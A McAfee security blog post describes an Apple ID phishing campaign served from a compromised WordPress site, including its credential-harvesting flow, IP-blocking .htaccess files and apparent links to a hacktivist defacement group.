Hacktivists Turn to Phishing to Fund Their Causes

By and on

At McAfee we recently observed a phishing campaign targeting Apple account holders.

1403_od001

The link directed the user to a compromised WordPress site used to serve the fake Apple ID login page.

1403_od043

Users are asked to log in with their Apple IDs, and then are requested to update billing information and credit card details. In the following images we have highlighted some indicators that the site is not legitimate.

e1403_od063

Users are then redirected to the official Apple page.

1403_od073

The phishers usually create a local .zip file that contains all of their scripts to create the phishing page. They upload this file to a compromised server, extract it, and delete the file. On this occasion, the phisher appears to have forgotten to perform this last step.

1403_od003

This oversight enabled us to see how the website code worked; we found some interesting comments.

The .zip file contained a readme that states the results would be stored locally, although this was not the case.

1403_od005

We also found some .htaccess files. These are used to block access to the site by checking the originating IP of the connection. This is done to prevent the site’s being accessed and analyzed by robot scrapers.

1403_od004

Depending on the page a user lands on—credit card, Apple login, or address change—a .php script generates an email and sends it to bayremking0@gmail.com.

1403_od006

In one of the .php files we found a reference a hacktivist group. We did some investigating and found this name had been associated with several website defacings. The group’s activities promote a set of political views, so we suspect that the group was funding its operations through this new phishing scam.

We received another phishing email that was identical to the original one apart from the URL it linked to. It served the same fake Apple page but this time it did not contain the .zip file. We went to the homepage of the compromised site and found it had also been defaced.

This confirmed our view that the original phishing site was hacked by the hacktivist group. It seems that political hackers are now using their skills to generate income to aid their causes.

McAfee customers are protected from this campaign through heuristic definitions and McAfee Global Threat Intelligence reputation.

Leave a Comment

Similar articles

This post was written with contributions from the McAfee Advanced Threat Research team.   The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download ...
Read Blog
2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. The ways in which they exact their ...
Read Blog